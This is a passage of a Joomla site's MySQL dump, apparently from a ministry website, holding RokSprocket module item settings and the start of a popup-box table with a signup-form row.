(1202, '361', 'joomla', '85', 0, '{\"tabs_item_title\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"tabs_item_link\":\"-default-\",\"tabs_item_description\":\"-default-\",\"tables_item_title\":\"-default-\",\"strips_item_title\":\"-default-\",\"mosaic_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"grids_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"tables_item_description\":\"-default-\",\"mosaic_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"grids_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":null,\"features_item_title\":\"-default-\",\"sliders_item_title\":\"-default-\",\"tables_item_price\":\"-none-\",\"quotes_item_subtext\":\"-none-\",\"sliders_item_description\":\"-default-\",\"lists_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"features_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"features_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"quotes_item_direction\":\"-bottomleft-\",\"headlines_item_link\":\"-default-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1199, '316', 'joomla', '69', 0, '{\"lists_item_title\":\"-default-\",\"lists_item_image\":\"-default-\",\"lists_item_link\":\"-default-\",\"lists_item_description\":\"-default-\",\"tables_item_title\":\"-default-\",\"strips_item_title\":\"-default-\",\"mosaic_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"quotes_item_description\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"tables_item_description\":\"-default-\",\"mosaic_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"tabs_item_description\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":null,\"features_item_title\":\"-default-\",\"sliders_item_title\":\"-default-\",\"tables_item_price\":\"-none-\",\"quotes_item_subtext\":\"-none-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"features_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"features_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"quotes_item_direction\":\"-bottomleft-\",\"headlines_item_link\":\"-default-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1184, '319', 'joomla', '74', 3, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/4.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_74__params_mosaic_item_image&undefined\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"couples-meeting\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1183, '319', 'joomla', '72', 2, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/3.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_72__params_mosaic_item_image&undefined&undefined\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"youth-camp, sunday-school\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1182, '319', 'joomla', '69', 1, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/2.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_69__params_mosaic_item_image&undefined&undefined\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"couples-meeting\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1181, '319', 'joomla', '71', 0, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/1.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_71__params_mosaic_item_image&undefined&undefined\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"youth-camp\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1194, '315', 'joomla', '73', 4, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/5.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_73__params_mosaic_item_image&undefined&undefined\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"photography\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1193, '315', 'joomla', '74', 3, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/4.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_74__params_mosaic_item_image&undefined\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"photography\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1192, '315', 'joomla', '72', 2, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/3.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_72__params_mosaic_item_image&undefined&undefined\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"print-design, web-design\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1191, '315', 'joomla', '69', 1, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/2.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_69__params_mosaic_item_image&undefined&undefined\'}\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"photography\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1190, '315', 'joomla', '71', 0, '{\"mosaic_item_title\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"mosaic_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/demo\\/mosaic\\/column_3\\/1.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_71__params_mosaic_item_image&undefined&undefined&undefined\'}\",\"mosaic_item_link\":\"-article-\",\"mosaic_item_tags\":\"print-design\",\"strips_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"tables_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tables_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"tabs_item_description\":\"-default-\",\"sliders_item_title\":\"-default-\",\"quotes_item_subtext\":\"-none-\",\"tables_item_price\":\"-none-\",\"features_item_title\":\"-default-\",\"lists_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"features_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"headlines_item_link\":\"-default-\",\"quotes_item_direction\":\"-bottomleft-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"features_item_image\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1201, '316', 'joomla', '77', 2, '{\"lists_item_title\":\"-default-\",\"lists_item_image\":\"-default-\",\"lists_item_link\":\"-default-\",\"lists_item_description\":\"-default-\",\"tables_item_title\":\"-default-\",\"strips_item_title\":\"-default-\",\"mosaic_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"quotes_item_description\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"tables_item_description\":\"-default-\",\"mosaic_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"tabs_item_description\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":null,\"features_item_title\":\"-default-\",\"sliders_item_title\":\"-default-\",\"tables_item_price\":\"-none-\",\"quotes_item_subtext\":\"-none-\",\"sliders_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"features_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"features_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"quotes_item_direction\":\"-bottomleft-\",\"headlines_item_link\":\"-default-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}'),
(1204, '361', 'joomla', '87', 2, '{\"tabs_item_title\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"tabs_item_link\":\"-default-\",\"tabs_item_description\":\"-default-\",\"tables_item_title\":\"-default-\",\"strips_item_title\":\"-default-\",\"mosaic_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"grids_item_description\":\"-default-\",\"quotes_item_description\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"tables_item_description\":\"-default-\",\"mosaic_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"grids_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":null,\"features_item_title\":\"-default-\",\"sliders_item_title\":\"-default-\",\"tables_item_price\":\"-none-\",\"quotes_item_subtext\":\"-none-\",\"sliders_item_description\":\"-default-\",\"lists_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"features_item_description\":\"-default-\",\"strips_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"features_item_image\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"quotes_item_direction\":\"-bottomleft-\",\"headlines_item_link\":\"-default-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"features_item_link\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}');
INSERT INTO `y57u5_roksprocket_items` (`id`, `module_id`, `provider`, `provider_id`, `order`, `params`) VALUES
(1590, '314', 'joomla', '126', 0, '{\"features_item_title\":\"-none-\",\"features_item_description\":\"-none-\",\"features_item_image\":\"{\'type\':\'mediamanager\',\'path\':\'images\\/ANWC_2019_CHURCH_SITE.jpg\',\'preview\':\'\',\'link\':\'index.php?option=com_media&view=images&layout=default&tmpl=component&e_name=items_joomla_126__params_features_item_image&undefined&undefined&undefined&undefined&undefined&undefined&undefined&undefined&undefined&undefined&undefined&undefined&undefined\'}\",\"features_item_link\":\"https:\\/\\/solaareogunministries.org\\/anwc2019\",\"tables_item_title\":\"-default-\",\"strips_item_title\":\"-default-\",\"mosaic_item_title\":\"-default-\",\"lists_item_title\":\"-default-\",\"grids_item_title\":\"-default-\",\"tabs_item_title\":\"-default-\",\"grids_item_description\":\"-default-\",\"tabs_item_icon\":\"-default-\",\"quotes_item_description\":\"-default-\",\"mosaic_item_description\":\"-default-\",\"tables_item_description\":\"-default-\",\"mosaic_item_image\":\"-default-\",\"lists_item_image\":\"-default-\",\"strips_item_image\":\"-default-\",\"tables_item_image\":\"-default-\",\"tabs_item_link\":\"-default-\",\"grids_item_image\":\"-default-\",\"quotes_item_image\":\"-default-\",\"quotes_item_author\":\"-none-\",\"tabs_item_description\":\"-default-\",\"lists_item_link\":\"-default-\",\"strips_item_link\":\"-default-\",\"grids_item_link\":\"-default-\",\"tables_item_class\":\"-none-\",\"mosaic_item_link\":\"-default-\",\"mosaic_item_tags\":\"-article-\",\"sliders_item_title\":\"-default-\",\"tables_item_price\":\"-none-\",\"quotes_item_subtext\":\"-none-\",\"sliders_item_description\":\"-default-\",\"lists_item_description\":\"-default-\",\"headlines_item_image\":\"-default-\",\"tables_item_feature_1\":\"-none-\",\"strips_item_description\":\"-default-\",\"quotes_item_link\":\"-default-\",\"tables_item_feature_2\":\"-none-\",\"quotes_item_direction\":\"-bottomleft-\",\"headlines_item_link\":\"-default-\",\"sliders_item_image\":\"-default-\",\"tables_item_feature_3\":\"-none-\",\"headlines_item_description\":\"-default-\",\"sliders_item_link\":\"-default-\",\"tables_item_feature_4\":\"-none-\",\"tables_item_link\":\"-default-\",\"tables_item_link_text\":\"Buy Now\"}');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_rstbox`
--

CREATE TABLE `y57u5_rstbox` (
  `id` int(11) NOT NULL,
  `name` varchar(50) NOT NULL,
  `testmode` tinyint(1) NOT NULL DEFAULT '0',
  `boxtype` varchar(30) NOT NULL,
  `customhtml` text,
  `position` varchar(30) NOT NULL,
  `triggermethod` varchar(50) NOT NULL,
  `cookie` mediumint(9) NOT NULL,
  `params` text NOT NULL,
  `published` tinyint(4) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_rstbox`
--

INSERT INTO `y57u5_rstbox` (`id`, `name`, `testmode`, `boxtype`, `customhtml`, `position`, `triggermethod`, `cookie`, `params`, `published`) VALUES
(1, 'Signup Form', 0, 'custom', '<button type=\"button\" data-ebox-cmd=\"closeKeep\" data-ebox=\"1\">Close</button>', 'bottom-right', 'pageload', 30, '{\"triggerelement\":\"\",\"triggerpercentage\":\"80\",\"triggerdelay\":\"0\",\"preventdefault\":\"1\",\"exittimer\":\"1000\",\"hashtag\":\"\",\"assign_impressions\":\"0\",\"assign_impressions_list\":\"3\",\"assign_impressions_param_type\":\"session\",\"closeopened\":\"0\",\"cookietype\":\"never\",\"animationin\":\"rstbox.slideUpIn\",\"animationout\":\"rstbox.slideUpOut\",\"duration\":\"400\",\"autohide\":\"1\",\"autoclose\":\"0\",\"autoclosevalue\":\"0\",\"width\":\"500px\",\"height\":\"auto\",\"padding\":\"10px\",\"textcolor\":\"rgba(51, 51, 51, 1)\",\"backgroundcolor\":\"rgba(255, 255, 255, 1)\",\"aligncontent\":\"\",\"boxshadow\":\"1\",\"bordertype\":\"solid\",\"bordercolor\":\"rgba(199, 44, 44, 1)\",\"borderwidth\":\"15px\",\"borderradius\":\"0px\",\"overlay\":\"0\",\"overlay_color\":\"rgba(0, 0, 0, 